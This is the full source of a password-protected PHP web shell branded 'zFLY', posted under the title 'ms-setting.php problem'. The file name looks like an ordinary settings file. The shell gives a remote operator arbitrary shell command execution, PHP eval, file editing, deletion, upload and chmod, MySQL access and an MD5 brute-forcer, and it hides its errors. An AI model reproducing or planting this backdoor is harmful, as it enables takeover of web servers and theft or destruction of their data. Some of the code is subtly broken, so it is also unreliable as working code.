ms-setting.php problem

1. <?php
2.  
3. error_reporting(0);
4.  
5. $password = "d48da8a4f42521d202a2a389e2b73ee4"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
6.  
7. $me = basename(__FILE__);
8. $cookiename = "ENF7ZT35Z5ni";
9.  
10.  
11. if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
12. {
13.  
14. if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
15. {
16. $_POST['pass'] = md5($_POST['pass']);
17. }
18.  
19. if($_POST['pass'] == $password)
20. {
21. setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
22. }
23. reload();
24. }
25.  
26.  
27.  
28. if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
29. {
30. login();
31. die();
32. }
33. //
34. //Do not cross this line! All code placed after this block can't be executed without being logged in!
35. //
36.  
37. if(isset($_GET['p']) && $_GET['p'] == "logout")
38. {
39. setcookie ($cookiename, "", time() - 3600);
40. reload();
41. }
42. if(isset($_GET['dir']))
43. {
44. chdir($_GET['dir']);
45. }
46.  
47.  
48. $pages = array(
49. 'cmd' => 'Execute Command',
50. 'eval' => 'Evaluate PHP',
51. 'mysql' => 'MySQL Query',
52. 'chmod' => 'Chmod File',
53. 'phpinfo' => 'PHPinfo',
54. 'md5' => 'md5 cracker',
55. 'headers' => 'Show headers',
56. 'logout' => 'Log out'
57. );
58.  
59. //The header, like it?
60. $header = '<html>
61. <title>'.getenv("HTTP_HOST").'</title>
62. <head>
63. <style>
64. td {
65. font-size: 12px;
66. font-family: verdana;
67. color: #33FF00;
68. background: #000000;
69. }
70.  
71. #d {
72. background: #003000;
73. }
74. #f {
75. background: #003300;
76. }
77. #s {
78. background: #006300;
79. }
80. #d:hover
81. {
82. background: #003300;
83. }
84. #f:hover
85. {
86. background: #003000;
87. }
88. pre {
89. font-size: 10px;
90. font-family: verdana;
91. color: #33FF00;
92. }
93. a:hover {
94. text-decoration: none;
95. }
96.  
97.  
98. input,textarea,select {
99. border-top-width: 1px;
100. font-weight: bold;
101. border-left-width: 1px;
102. font-size: 10px;
103. border-left-color: #33FF00;
104. background: #000000;
105. border-bottom-width: 1px;
106. border-bottom-color: #33FF00;
107. color: #33FF00;
108. border-top-color: #33FF00;
109. font-family: verdana;
110. border-right-width: 1px;
111. border-right-color: #33FF00;
112. }
113.  
114. hr {
115. color: #33FF00;
116. background-color: #33FF00;
117. height: 5px;
118. }
119.  
120. </style>
121.  
122. </head>
123. <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
124. <table width=100%><td id="header" width=100%>
125. <p align=right><b>[zFLY] [<a href="'.$me.'">Home</a>] ';
126.  
127. foreach($pages as $page => $page_name)
128. {
129. $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
130.  
131. }
132. $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
133. print $header;
134.  
135. $footer = '<tr><td><hr><center>&copy; <a href="http://">ZflY</a> & <a href="http://">z3t</a></center></td></table></body></head></html>';
136.  
137.  
138. //
139. //Page handling
140. //
141. if(isset($_REQUEST['p']))
142. {
143. switch ($_REQUEST['p']) {
144.  
145. case 'cmd': //Run command
146.  
147. print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
148. if(isset($_REQUEST['command']))
149. {
150. print "<pre>";
151. execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
152. }
153. break;
154.  
155.  
156. case 'edit': //Edit a fie
157. if(isset($_POST['editform']))
158. {
159. $f = $_GET['file'];
160. $fh = fopen($f, 'w') or print "Error while opening file!";
161. fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
162. fclose($fh);
163. }
164. print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
165.  
166. if(file_exists($_GET['file']))
167. {
168. $rd = file($_GET['file']);
169. foreach($rd as $l)
170. {
171. print htmlspecialchars($l);
172. }
173. }
174.  
175. print "</textarea><input type=submit value=\"Save\"></form>";
176.  
177. break;
178.  
179. case 'delete': //Delete a file
180.  
181. if(isset($_POST['yes']))
182. {
183. if(unlink($_GET['file']))
184. {
185. print "File deleted successfully.";
186. }
187. else
188. {
189. print "Couldn't delete file.";
190. }
191. }
192.  
193.  
194. if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
195. {
196. print "Are you sure you want to delete ".$_GET['file']."?<br>
197. <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
198. <input type=hidden name=yes value=yes>
199. <input type=submit value=\"Delete\">
200. ";
201. }
202.  
203.  
204. break;
205.  
206.  
207. case 'eval': //Evaluate PHP code
208.  
209. print "<form action=\"".$me."?p=eval\" method=POST>
210. <textarea cols=60 rows=10 name=\"eval\">";
211. if(isset($_POST['eval']))
212. {
213. print htmlspecialchars($_POST['eval']);
214. }
215. else
216. {
217. print "print \"Yo Momma\";";
218. }
219. print "</textarea><br>
220. <input type=submit value=\"Eval\">
221. </form>";
222.  
223. if(isset($_POST['eval']))
224. {
225. print "<h1>Output:</h1>";
226. print "<br>";
227. eval($_POST['eval']);
228. }
229.  
230. break;
231.  
232. case 'chmod': //Chmod file
233.  
234.  
235. print "<h1>Under construction!</h1>";
236. if(isset($_POST['chmod']))
237. {
238. switch ($_POST['chvalue']){
239. case 777:
240. chmod($_POST['chmod'],0777);
241. break;
242. case 644:
243. chmod($_POST['chmod'],0644);
244. break;
245. case 755:
246. chmod($_POST['chmod'],0755);
247. break;
248. }
249. print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
250. }
251. if(isset($_GET['file']))
252. {
253. $content = urldecode($_GET['file']);
254. }
255. else
256. {
257. $content = "file/path/please";
258. }
259.  
260. print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
261. <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
262. <select name=\"chvalue\">
263. <option value=\"777\">777</option>
264. <option value=\"644\">644</option>
265. <option value=\"755\">755</option>
266. </select><input type=submit value=\"Change\">";
267.  
268. break;
269.  
270. case 'mysql': //MySQL Query
271.  
272. if(isset($_POST['host']))
273. {
274. $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
275. mysql_select_db($_POST['dbase']);
276. $sql = $_POST['query'];
277.  
278.  
279. $result = mysql_query($sql);
280.  
281. }
282. else
283. {
284. print "
285. This only queries the database, doesn't return data!<br>
286. <form action=\"".$me."?p=mysql\" method=POST>
287. <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
288. <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
289. <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
290. <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
291.  
292. <b>Query:<br></b<textarea name=query></textarea>
293. <input type=submit value=\"Query database\">
294. </form>
295. ";
296.  
297. }
298.  
299. break;
300.  
301. case 'createdir':
302. if(mkdir($_GET['crdir']))
303. {
304. print 'Directory created successfully.';
305. }
306. else
307. {
308. print 'Couldn\'t create directory';
309. }
310. break;
311.  
312.  
313. case 'phpinfo': //PHP Info
314. phpinfo();
315. break;
316.  
317.  
318. case 'rename':
319.  
320. if(isset($_POST['fileold']))
321. {
322. if(rename($_POST['fileold'],$_POST['filenew']))
323. {
324. print "File renamed.";
325. }
326. else
327. {
328. print "Couldn't rename file.";
329. }
330.  
331. }
332. if(isset($_GET['file']))
333. {
334. $file = basename(htmlspecialchars($_GET['file']));
335. }
336. else
337. {
338. $file = "";
339. }
340.  
341. print "Renaming ".$file." in folder ".realpath('.').".<br>
342. <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
343. <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
344. <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
345. <input type=submit value=\"Rename file\">
346. </form>";
347. break;
348.  
349. case 'md5':
350. if(isset($_POST['md5']))
351. {
352. if(!is_numeric($_POST['timelimit']))
353. {
354. $_POST['timelimit'] = 30;
355. }
356. set_time_limit($_POST['timelimit']);
357. if(strlen($_POST['md5']) == 32)
358. {
359.  
360. if($_POST['chars'] == "9999")
361. {
362. $i = 0;
363. while($_POST['md5'] != md5($i) && $i != 100000)
364. {
365. $i++;
366. }
367. }
368. else
369. {
370. for($i = "a"; $i != "zzzzz"; $i++)
371. {
372. if(md5($i == $_POST['md5']))
373. {
374. break;
375. }
376. }
377. }
378.  
379.  
380. if(md5($i) == $_POST['md5'])
381. {
382. print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
383. }
384.  
385. }
386.  
387. }
388.  
389. print "Will bruteforce the md5
390. <form action=\"".$me."?p=md5\" method=POST>
391. <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
392. <b>Characters:</b><br><select name=\"chars\">
393. <option value=\"az\">a - zzzzz</option>
394. <option value=\"9999\">1 - 9999999</option>
395. </select>
396. <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
397. <input type=submit value=\"Bruteforce md5\">
398. </form><br>*: if set_time_limit is allowed by php.ini";
399. break;
400.  
401. case 'headers':
402. foreach(getallheaders() as $header => $value)
403. {
404. print htmlspecialchars($header . ":" . $value)."<br>";
405.  
406. }
407. break;
408. }
409.  
410. }
411. else //Default page that will be shown when the page isn't found or no page is selected.
412. {
413.  
414. $files = array();
415. $directories = array();
416.  
417. if(isset($_FILES['uploadedfile']['name']))
418. {
419. $target_path = realpath('.').'/';
420. $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
421.  
422. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
423. print "File:". basename( $_FILES['uploadedfile']['name']).
424. " has been uploaded";
425. } else{
426. echo "File upload failed!";
427. }
428. }
429.  
430.  
431.  
432.  
433.  
434. print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
435. if ($handle = opendir('.'))
436. {
437. while (false !== ($file = readdir($handle)))
438. {
439. if(is_dir($file))
440. {
441. $directories[] = $file;
442. }
443. else
444. {
445. $files[] = $file;
446. }
447. }
448. asort($directories);
449. asort($files);
450. foreach($directories as $file)
451. {
452. print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
453. }
454.  
455. foreach($files as $file)
456. {
457. print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
458. }
459. }
460. else
461. {
462. print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
463. }
464.  
465. print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
466. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
467. <input type=\"submit\" value=\"Upload File\" />
468. </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
469. <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
470. </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
471. </table>";
472.  
473.  
474. }
475.  
476.  
477. function login()
478. {
479. print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
480. <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
481. <input type=\"password\" maxlength=\"35\" name=\"pass\"><input type=\"submit\" value=\"Login\">
482. </form>";
483. }
484. function reload()
485. {
486. header("Location: ".basename(__FILE__));
487. }
488.  
489. function get_execution_method()
490. {
491. if(function_exists('passthru')){ $m = "passthru"; }
492. if(function_exists('exec')){ $m = "exec"; }
493. if(function_exists('shell_exec')){ $m = "shell_ exec"; }
494. if(function_exists('system')){ $m = "system"; }
495. if(!isset($m)) //No method found :-|
496. {
497. $m = "Disabled";
498. }
499. return($m);
500. }
501.  
502. function execute_command($method,$command)
503. {
504. if($method == "passthru")
505. {
506. passthru($command);
507. }
508.  
509. elseif($method == "exec")
510. {
511. exec($command,$result);
512. foreach($result as $output)
513. {
514. print $output."<br>";
515. }
516. }
517.  
518. elseif($method == "shell_exec")
519. {
520. print shell_exec($command);
521. }
522.  
523. elseif($method == "system")
524. {
525. system($command);
526. }
527.  
528. }
529.  
530. function perm($file)
531. {
532. if(file_exists($file))
533. {
534. return substr(sprintf('%o', fileperms($file)), -4);
535. }
536. else
537. {
538. return "????";
539. }
540. }
541.  
542. function get_color($file)
543. {
544. if(is_writable($file)) { return "green";}
545. if(!is_writable($file) && is_readable($file)) { return "white";}
546. if(!is_writable($file) && !is_readable($file)) { return "red";}
547.  
548.  
549.  
550. }
551.  
552. function show_dirs($where)
553. {
554. if(ereg("^c:",realpath($where)))
555. {
556. $dirparts = explode('\\',realpath($where));
557. }
558. else
559. {
560. $dirparts = explode('/',realpath($where));
561. }
562.  
563.  
564.  
565. $i = 0;
566. $total = "";
567.  
568. foreach($dirparts as $part)
569. {
570. $p = 0;
571. $pre = "";
572. while($p != $i)
573. {
574. $pre .= $dirparts[$p]."/";
575. $p++;
576.  
577. }
578. $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
579. $i++;
580. }
581.  
582. return "<h2>".$total."</h2><br>";
583.  
584. }
585. print $footer;
586.  
587. // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
588. exit();
589. ?>